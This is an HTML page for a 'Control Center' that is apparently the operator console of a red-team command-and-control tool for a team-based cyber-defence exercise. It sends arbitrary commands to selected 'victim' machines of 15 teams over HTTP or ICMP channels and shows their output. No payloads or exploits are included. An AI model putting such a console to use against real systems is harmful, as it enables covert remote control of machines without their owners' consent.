<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Control Center</title>
    <style>
        td, th{
            padding: 3px;
        }
        td:not(:first-of-type){
            text-align: center;
        }
    </style>
</head>
<body>
    <!-- <p>Return port: <input type="text" name="return_port" id="proc_return_port" required pattern="\d+" value="443"></p> -->
    <!-- <fieldset>
        <legend>Processd (HTTP)</legend>
        <form action="/processd" method="POST">
            <p>Victim: <input type="text" name="vic_ip" id="proc_vic_ip" required pattern="(\d{1,3}\.){3}\d{1,3}"></p>
            <p>Command: <input type="text" name="command" id="proc_command" required></p>
            <input type="submit" value="Run!">
        </form>
        <p id="proc_label">Output:</p>
        <pre id="proc_output"></pre>
    </fieldset>
    <fieldset>
        <legend>ICMPc2 (ICMP)</legend>
        <form action="/icmp" method="POST">
            <p>Victim: <input type="text" name="vic_ip" id="icmp_vic_ip" required pattern="(\d{1,3}\.){3}\d{1,3}"></p>
            <p>Command: <input type="text" name="command" id="icmp_command" required></p>
            <input type="submit" value="Run!">
        </form>
        <p id="icmp_label">Output:</p>
        <pre id="icmp_output"></pre>
    </fieldset> -->
    <form>
        <table border="1">
            <thead>
                <tr>
                    <th>Select All</th>
                    <th><input type="checkbox" name="include" value="ad"></th>
                    <th><input type="checkbox" name="include" value="ubuntu1"></th>
                    <th><input type="checkbox" name="include" value="ubuntu2"></th>
                    <th><input type="checkbox" name="include" value="webapp"></th>
                    <th><input type="checkbox" name="include" value="windows1"></th>
                    <th><input type="checkbox" name="include" value="windows2"></th>
                </tr>
                <tr>
                    <th>Team #</th>
                    <th>10.X.1.60 (AD)</th>
                    <th>10.X.1.10 (Ubuntu1)</th>
                    <th>10.X.1.40 (Ubuntu2)</th>
                    <th>10.X.1.30 (WebApp)</th>
                    <th>10.X.1.70 (Windows1)</th>
                    <th>10.X.1.80 (Windows2)</th>
                </tr>
            </thead>
            <tbody id="tbody"></tbody>
        </table>
        <p>Command: <input type="text" name="command" id="command"></p>
        <p>Use: <select name="use" id="use">
            <option value="processd">HTTP</option>
            <option value="icmp" selected>ICMP</option>
        </select></p>
        <p><input type="submit" value="Run"></p>
    </form>
    <fieldset>
        <legend>Output</legend>
        See output from:
        <select name="" id="outputs"></select>
        <pre id="output"></pre>
    </fieldset>
    <script>
        const tbody = document.getElementById("tbody");
        const machine_ips = [60,10,40,30,70,80]
        for(let i = 0+1; i < 15+1; i++){
            const row = document.createElement("tr");
            const checkbox_container = document.createElement("td");
            let checkbox = document.createElement("input");
            checkbox.type = "checkbox";
            checkbox.name = "include";
            checkbox.value = `all_Team${i}`;
            checkbox.id = checkbox.value;
            checkbox.style.float = "right";
            let label = document.createElement("label");
            label.for = checkbox.id;
            label.textContent = i;
            label.style.float = "left";
            checkbox_container.append(label);
            checkbox_container.append(checkbox);
            row.append(checkbox_container);
            for(let j = 0; j < 6; j++){
                const td = document.createElement("td");
                const chkbx = document.createElement("input");
                
                chkbx.type = "checkbox";
                chkbx.name = "include";
                chkbx.value = `10.${i}.1.${machine_ips[j]}`;

                td.append(chkbx);
                row.append(td);
            }
            tbody.append(row);
        }

        const form = document.forms[0];
        form.addEventListener("submit", function(e){
            e.preventDefault();
            e.stopImmediatePropagation();
            fetch("/run", {
                method: "POST",
                headers: {
                    "Content-Type": "application/json"
                },
                body: JSON.stringify({
                    include: [...document.querySelectorAll("[name=include]")].filter(x=>x.checked).map(x=>x.value),
                    command: document.forms[0].elements.command.value,
                    use: document.forms[0].elements.use.value
                })
            }).then(res=>res.text()).then(json=>{
                console.log(json)
                document.getElementById("outputs").innerHTML = "";
                const data = JSON.parse(json)
                window.data = data;
                const keys = Object.keys(data);
                for(let key of keys){
                    const option = document.createElement("option");
                    option.value = key;
                    option.textContent = key;
                    document.getElementById("outputs").append(option);
                }
                document.getElementById("output").textContent = data[keys[0]].replaceAll(/\\n/g, "\n");
            })
        });

        document.getElementById("outputs").addEventListener("change", function(e){
            const ip = e.target.value;
            document.getElementById("output").textContent = window.data[ip].replaceAll(/\\n/g, "\n");
        });

        // const form = document.forms[0]
        // form.addEventListener("submit", function(e){
        //     document.getElementById("proc_label").textContent = "Output: Running..."
        //     // const return_port = form.elements.return_port.value;
        //     const vic_ip = form.elements.vic_ip.value;
        //     const command = form.elements.command.value;
        //     e.preventDefault();
        //     e.stopImmediatePropagation();
        //     fetch("/processd", {
        //         method: "POST",
        //         headers: {
        //             "Content-Type": "application/json"
        //         },
        //         body: JSON.stringify({
        //             // return_port,
        //             vic_ip,
        //             command
        //         })
        //     }).then(res=>res.text()).then(data=>{
        //         document.getElementById("proc_label").textContent = "Output:"
        //         document.getElementById("proc_output").textContent = data;
        //     });
        //     return false;
        // });
        // const icmp_form = document.forms[1];
        // icmp_form.addEventListener("submit", function(e){
        //     document.getElementById("icmp_label").textContent = "Output: Running..."
        //     const vic_ip = icmp_form.elements.vic_ip.value;
        //     const command = icmp_form.elements.command.value;
        //     e.preventDefault();
        //     e.stopImmediatePropagation();
        //     fetch("/icmp", {
        //         method: "POST",
        //         headers: {
        //             "Content-Type": "application/json"
        //         },
        //         body: JSON.stringify({
        //             vic_ip,
        //             command
        //         })
        //     }).then(res=>res.text()).then(data=>{
        //         document.getElementById("icmp_label").textContent = "Output:"
        //         document.getElementById("icmp_output").textContent = data;
        //     });
        //     return false;
        // });
    </script>
</body>
</html>